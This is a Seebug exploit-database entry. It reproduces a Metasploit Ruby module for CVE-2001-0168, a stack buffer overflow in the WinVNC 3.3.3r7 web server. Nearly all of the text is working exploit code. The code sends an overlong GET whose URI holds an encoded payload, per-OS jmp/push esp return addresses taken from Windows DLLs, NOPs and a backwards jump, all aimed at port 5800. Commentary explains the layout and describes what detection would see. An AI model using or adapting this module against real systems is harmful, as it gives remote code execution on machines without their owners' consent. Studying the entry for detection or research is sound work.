
seebug / Root / SSV:71005
History: Jul 01, 2014 - 12:00 a.m.

WinVNC Web Server <= 3.3.3r7 - GET Overflow

2014-07-01 00:00:00
Root
www.seebug.org
8

No description provided by source.


##
# $Id: winvnc_http_get.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


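	##
	# WinVNC Web Server <= v3.3.3r7 GET Overflow (CVE-2001-0168, BID 2306, OSVDB 6280).
	#
	# Sends a single, overly long HTTP GET to the WinVNC web server (RPORT 5800 by
	# default). As the module description states, the overflow is only reachable
	# when the server's non-default debugging mode with logging is enabled, so a
	# stock configuration is not affected by this request. For detection purposes
	# the request is a GET whose URI is several hundred bytes of opaque data
	# (payload space is 979 bytes) followed by a 4-byte return address, NOPs and a
	# short jmp; the module never reads the HTTP response.
	##
	class Metasploit3 < Msf::Exploit::Remote
		Rank = AverageRanking

		include Msf::Exploit::Remote::HttpClient

		# Registers module metadata (name, references, payload constraints and the
		# per-OS return addresses) and the RPORT option.
		#
		# The 'Ret' values are fixed per target and are not validated at runtime;
		# the target comments record which library they came from.
		#
		# @param info [Hash] module info merged by the framework through update_info
		def initialize(info = {})
			super(update_info(info,
				'Name'		=> 'WinVNC Web Server <= v3.3.3r7 GET Overflow',
				'Description'	=> %q{
					This module exploits a buffer overflow in the AT&T WinVNC version
					<= v3.3.3r7 web server. When debugging mode with logging is
					enabled (non-default), an overly long GET request can overwrite
					the stack. This exploit does not work well with VNC payloads!
				},
				'Author' 	=> 'patrick',
				'License'       => MSF_LICENSE,
				'Version'       => '$Revision: 7724 $',
				'References'    =>
				[
					[ 'BID', '2306' ],
					[ 'OSVDB', '6280' ],
					[ 'CVE', '2001-0168' ],
				],
				'Privileged'		=> true,
				'DefaultOptions'	=>
				{
					'EXITFUNC'	=> 'thread',
				},
				'Payload'		=>
					{
						'Space'			=> 979,
						# NOTE(review): \x0b appears twice in this set; harmless but redundant.
						'BadChars' 		=> "\x00\x09\x0a\x0b\x0c\x0d\x20\x0b",
						'StackAdjustment' 	=> -3500,
					},
				'Platform' => ['win'],
				'Targets'  =>
				[
					[ 'Windows NT4 SP3-6', 	{ 'Ret' => 0x779f4e39 } ], # push esp, ret msvcrt.dll
					[ 'Windows 2000 SP1-4', { 'Ret' => 0x77bba3af } ], # jmp esp comctl32.dll
					[ 'Windows XP SP0-1', 	{ 'Ret' => 0x71ab7bfb } ], # jmp esp ws2_32.dll
				],
				'DisclosureDate' => 'Jan 29 2001',
				'DefaultTarget' => 1))

				# Only the port is registered here; host/SSL options come from HttpClient.
				register_options(
				[
					Opt::RPORT(5800),
				],self.class)
		end

		# Builds the request URI, sends it as a raw GET and hands off to the
		# payload handler.
		#
		# The HTTP response is never inspected (the original assigned it to an
		# unused local, which is dropped here), so the only success signal is the
		# handler itself.
		#
		# @return [void]
		def exploit
			# URI layout: '/' + encoded payload + target 'Ret' packed little-endian,
			# then 8 NOPs and the jmp that Rex::Arch::X86.jmp emits for 0xfffffc1c.
			sploit = '/' + payload.encoded + [target['Ret']].pack('V')
			sploit << make_nops(8) + Rex::Arch::X86.jmp(0xfffffc1c)

			# Second argument is the HttpClient request timeout (5 seconds);
			# the return value is intentionally discarded.
			send_request_raw({
				'uri'          => sploit,
				'method'       => 'GET',
			}, 5)

			handler
		end
	end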